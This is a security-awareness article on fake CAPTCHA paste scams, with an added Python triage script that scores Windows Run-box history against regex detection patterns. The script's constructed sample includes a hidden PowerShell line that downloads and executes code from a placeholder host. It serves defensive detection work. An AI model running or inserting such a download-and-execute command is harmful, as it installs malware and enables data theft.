What is a CAPTCHA scam?
A fake CAPTCHA is a web page element designed to look like a legitimate CAPTCHA challenge but is actually a scam. Its purpose is to trick you into running malicious code on your own device, which can lead to malware infection and data theft.
Security researchers describe the resulting malware as a digital pickpocket: it quietly searches your computer for information it can easily steal, such as credentials saved in your browser, Outlook login data, account details, crypto-wallet data and other sensitive items.
Examples of a CAPTCHA scam
Common variants ask you to scan a QR code, or to copy text the page has placed on your clipboard and paste it into a terminal or the Windows Run box. The most common version uses a "bait-and-switch" tactic: the website shows what looks like a real CAPTCHA test, then a fake error message pops up telling you to apply a "fix".
Fake error messages used to trick users include:
- A "Copy fix" button followed by instructions to install or run what it copied
- A "Please Install" error message
- Anything that asks you to open Windows Terminal or the Run box
Red flags to watch out for
- Keyboard Shortcuts: A legitimate website will never ask you to type commands or use keyboard shortcuts (for example, Win+R, then Ctrl+V, then Enter to paste and run code) just to prove you are human.
- Unfamiliar Domains: Real CAPTCHAs are embedded into trusted websites. Fake ones often pop up on suspicious, unfamiliar, or "sketchy" web addresses.
- Downloads: If a "CAPTCHA" asks you to download a file to complete verification, it is a scam.
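The red flags above (a command you are told to paste into the Run box or a terminal) leave traces a responder can check after the fact. The following is an added example, not code from the original article: a Python triage helper that reads back the Windows Run-box history, which Explorer keeps under the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and scores each entry for the indicators described in this article (a hidden interpreter fetching and running remote code). The key path and value layout are real Windows behaviour; the sample registry values, the command text and the example.invalid URL are constructed for illustration, and the same scoring function works on a command line pulled from a terminal history file or an EDR process event.

```python
"""
Triage helper for fake-CAPTCHA ("ClickFix") paste attacks.

Added example, not code from the original article. Two checks a responder
wants after a user reports a CAPTCHA that asked them to paste something:
(1) read back what was typed into the Windows Run box, which Explorer keeps
under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, and
(2) score each command for the indicators the article describes.
All registry values and commands below are constructed samples; on a real
host you would read the key with winreg or PowerShell and feed it in.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators commonly present in a command a victim is told to paste.
INDICATORS = [
    ("interpreter",     re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|certutil|bitsadmin)(\.exe)?\b", re.I)),
    ("hidden_window",   re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download_cradle", re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|curl|wget)\b", re.I)),
    ("in_memory_exec",  re.compile(r"\b(iex|Invoke-Expression)\b|\|\s*(sh|bash)\b", re.I)),
    ("remote_url",      re.compile(r"https?://", re.I)),
    ("bypass_flags",    re.compile(r"-(ep|ExecutionPolicy)\s+bypass\b|-nop\b|-NoProfile\b", re.I)),
    # Pasted "fixes" often end with a comment so the Run box shows a
    # reassuring verification message instead of the real command.
    ("captcha_lure",    re.compile(r"#.*(not a robot|verif|captcha)", re.I)),
]


@dataclass
class Verdict:
    command: str
    indicators: List[str]
    suspicious: bool


def analyze_command(command: str) -> Verdict:
    """Score one command string. A download cradle chained into in-memory or
    encoded execution is the signature shape of a pasted 'fix'; otherwise
    require several weaker signals together so normal admin use is not flagged."""
    hits = [name for name, rx in INDICATORS if rx.search(command)]
    chained = "download_cradle" in hits and (
        "in_memory_exec" in hits or "encoded_command" in hits)
    return Verdict(command, hits, chained or len(hits) >= 3)


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return Run-box history, most recent first, from the RunMRU key's values.
    Explorer stores each entry under a one-letter value name with a trailing
    '\\1' marker and records the order in the MRUList string."""
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def triage_runmru(values: Dict[str, str]) -> List[Verdict]:
    """Run the indicator check over every Run-box history entry."""
    return [analyze_command(cmd) for cmd in parse_runmru(values)]


# Constructed sample of a RunMRU key after a ClickFix-style paste. The
# domain and path are placeholders, not a real indicator.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/fix.txt)" '
         '# I am not a robot - reCAPTCHA Verification ID: 1234\\1',
}

if __name__ == "__main__":
    for v in triage_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"[{flag:10}] {v.command[:70]}  {v.indicators}")
```

The scoring is deliberately conservative: a lone `powershell -NoProfile` is routine, while a download cradle piped straight into `iex` (or `curl ... | sh` on macOS and Linux, which the same function catches) is the shape of a pasted "fix" and is flagged on its own. Empty or benign Run history is not proof the user is clean; a paste into an already-open terminal never touches RunMRU.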
If you spot a CAPTCHA scam
- Take a screenshot of the CAPTCHA or error message and report the page you were visiting: to your security office if it happened at work, or to the Federal Trade Commission otherwise.
- Also report any additional steps you took, such as copying, pasting or running the command.
- If you got to the site by clicking a link in an email, use the “report message” button.
How to stay safe
- The most important rule of thumb is this: A legitimate website will never ask you to run a command or use a keyboard shortcut to prove you are human.
- Close the tab: If a site asks you to open a "Run" box or paste code, it is a CAPTCHA scam. Close the window immediately.
- Go direct: If you’re worried a site is blocked, don’t follow the links on the screen. Type the address directly into your browser yourself.
- Create a passkey: If you are prompted to create a passkey to log in to your accounts, do it! Passkeys are more secure than a password because there is nothing for you to remember or type, they cannot be phished by a look-alike site, and a breach of the website exposes only a public key, which is useless to an attacker.
- Use MFA: Always turn on Multi-Factor Authentication (MFA). Even if a criminal steals your password, MFA acts like a second deadbolt on your door that they can’t unlock.
What to do if you fall victim
If you followed the prompts and ran the command, act immediately to protect your data:
- Disconnect from the internet: Turn off your Wi-Fi or unplug your internet cable to stop the malware from sending your data to the scammer.
- Change your passwords: Using a different, safe device (like your phone or tablet), change the passwords for all of your important accounts, and sign out of all other sessions where the account offers it, since the malware may have copied your browser's saved logins and active sessions.
- Run a scan: Run a full scan using trusted antivirus or anti-malware software, or have your security office check the machine. Information-stealing malware often finishes and sends its haul within minutes, so a clean scan afterward does not mean nothing was taken; change your passwords regardless.
- Watch your money: Check your bank and card statements for any charges you don't recognize.